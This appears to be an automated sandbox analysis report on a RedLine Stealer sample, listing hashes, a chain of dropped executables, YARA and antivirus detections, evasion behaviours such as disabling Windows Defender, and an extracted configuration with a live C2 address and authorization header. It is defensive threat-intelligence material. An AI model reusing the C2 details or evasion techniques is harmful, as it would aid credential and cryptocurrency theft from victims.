Edit tour

Windows Analysis Report
pYHrqNhFKr.exe

Overview

General Information

Sample Name:	pYHrqNhFKr.exe
Original Sample Name:	65cab4a566b172d984c8f8ebfdbdfea0.exe
Analysis ID:	829683
MD5:	65cab4a566b172d984c8f8ebfdbdfea0
SHA1:	5628ef015cc37598a43b0f032b1ef91ad7f24934
SHA256:	4700abbc439afe49697e67333bf6d3fcb04b73d73f44b40f68ed20a1e4812a8b
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Disable Windows Defender real time protection (registry)

Machine Learning detection for sample

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Disable Windows Defender notifications (registry)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

pYHrqNhFKr.exe (PID: 2980 cmdline: C:\Users\user\Desktop\pYHrqNhFKr.exe MD5: 65CAB4A566B172D984C8F8EBFDBDFEA0)

niba6073.exe (PID: 2968 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe MD5: 7ED66C765EC9F99A5D8215486D6BC8C9)

niba2214.exe (PID: 5268 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe MD5: 6775BA3EF89ACFDA026F96DF54C2C21D)

f7051zI.exe (PID: 5244 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

h99af07.exe (PID: 6132 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe MD5: C8B5287FF76DDEC6B7F8C0DA94084603)

rundll32.exe (PID: 408 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 5140 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 1004 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "193.233.20.28:4125", "Bot Id": "ruka", "Message": "", "Authorization Header": "5d1d0e51ebe1e3f16cca573ff651c43c"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a430:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1328:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.h99af07.exe.2bf0e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.h99af07.exe.2bf0e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.h99af07.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.h99af07.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.h99af07.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.h99af07.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0.3.pYHrqNhFKr.exe.4c79c20.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.pYHrqNhFKr.exe.4c79c20.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a430:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.pYHrqNhFKr.exe.4c79c20.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.3.pYHrqNhFKr.exe.4c79c20.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x18830:$pat14: , CommandLine: 0x118a7:$v2_1: ListOfProcesses 0x11686:$v4_3: base64str 0x121ff:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c11:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
Click to see the 5 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: pYHrqNhFKr.exe	ReversingLabs: Detection: 69%
Source: pYHrqNhFKr.exe	Virustotal: Detection: 50%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: pYHrqNhFKr.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe

Avira: detection malicious, Label: HEUR/AGEN.1252166

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	Virustotal: Detection: 81%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Virustotal: Detection: 56%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe	Virustotal: Detection: 51%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Virustotal: Detection: 53%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	ReversingLabs: Detection: 46%

Machine Learning detection for sample

Source: pYHrqNhFKr.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe	Joe Sandbox ML: detected

Source: 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.28:4125", "Bot Id": "ruka", "Message": "", "Authorization Header": "5d1d0e51ebe1e3f16cca573ff651c43c"}

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	0_2_008A2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00072F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	1_2_00072F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01252F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	2_2_01252F1D

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Unpacked PE file: 5.2.h99af07.exe.400000.0.unpack

Source: pYHrqNhFKr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: pYHrqNhFKr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wextract.pdb source: pYHrqNhFKr.exe, niba6073.exe.0.dr, niba2214.exe.1.dr
Source:	Binary string: Healer.pdb source: h99af07.exe, 00000005.00000003.281384842.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307743738.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.308257566.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, h99af07.exe, 00000005.00000002.307495557.0000000004750000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307402577.0000000004640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: pYHrqNhFKr.exe, niba6073.exe.0.dr, niba2214.exe.1.dr
Source:	Binary string: <C:\zarepot\talotoyuy1\guf.pdb source: niba6073.exe, 00000001.00000003.242966738.0000000004521000.00000004.00000020.00020000.00000000.sdmp, imYkV36.exe.1.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: niba2214.exe, 00000002.00000003.243954252.0000000004A0C000.00000004.00000020.00020000.00000000.sdmp, f7051zI.exe, 00000003.00000000.244138101.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, f7051zI.exe.2.dr
Source:	Binary string: C:\tugiwozexe-hon68\xozutuboreja.pdb source: niba2214.exe, 00000002.00000003.243954252.0000000004A0C000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000000.269895289.0000000000401000.00000020.00000001.01000000.00000009.sdmp, h99af07.exe.2.dr
Source:	Binary string: _.pdb source: h99af07.exe, 00000005.00000003.281384842.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307743738.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, h99af07.exe, 00000005.00000003.283921128.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307495557.0000000004750000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307402577.0000000004640000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\zarepot\talotoyuy1\guf.pdb source: niba6073.exe, 00000001.00000003.242966738.0000000004521000.00000004.00000020.00020000.00000000.sdmp, imYkV36.exe.1.dr
Source:	Binary string: Healer.pdbH5 source: h99af07.exe, 00000005.00000003.281384842.0000000002EF3000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307743738.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.308257566.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, h99af07.exe, 00000005.00000002.307495557.0000000004750000.00000004.00000020.00020000.00000000.sdmp, h99af07.exe, 00000005.00000002.307402577.0000000004640000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_008A2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00072390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00072390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01252390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_01252390

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 193.233.20.28:4125

Source: pYHrqNhFKr.exe, 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, l64fQ59.exe.0.dr

String found in binary or memory: https://api.ip.sb/ip

Source: h99af07.exe, 00000005.00000002.307016604.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.h99af07.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.h99af07.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.h99af07.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.pYHrqNhFKr.exe.4c79c20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.pYHrqNhFKr.exe.4c79c20.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: pYHrqNhFKr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5.2.h99af07.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.h99af07.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.h99af07.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.pYHrqNhFKr.exe.4c79c20.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.pYHrqNhFKr.exe.4c79c20.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	0_2_008A1F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00071F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	1_2_00071F90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01251F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,	2_2_01251F90

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A3BA2	0_2_008A3BA2
Source: C:\Users\user\Desktop\pYHrqNhFKr.exe	Code function: 0_2_008A5C9E	0_2_008A5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00073BA2	1_2_00073BA2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	Code function: 1_2_00075C9E	1_2_00075C9E
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01253BA2	2_2_01253BA2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	Code function: 2_2_01255C9E	2_2_01255C9E
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0040DC11	5_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00407C3F	5_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00418CCC	5_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00406CA0	5_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_004028B0	5_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_0041A4BE	5_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00418244	5_2_00418244
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00401650	5_2_00401650
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00402F20	5_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_004193C4	5_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00418788	5_2_00418788
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00402F89	5_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_00402B90	5_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_004073A0	5_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	Code function: 5_2_045E0DB0	5_2_045E0DB0

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Code function: String function: 0040E1D8 appears 44 times

Source: pYHrqNhFKr.exe	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 710141 bytes, 2 files, at 0x2c +A "niba6073.exe" +A "l64fQ59.exe", ID 1861, number 1, 28 datablocks, 0x1503 compression
Source: niba6073.exe.0.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 564865 bytes, 2 files, at 0x2c +A "niba2214.exe" +A "imYkV36.exe", ID 1948, number 1, 23 datablocks, 0x1503 compression
Source: niba2214.exe.1.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 205776 bytes, 2 files, at 0x2c +A "f7051zI.exe" +A "h99af07.exe", ID 1758, number 1, 11 datablocks, 0x1503 compression

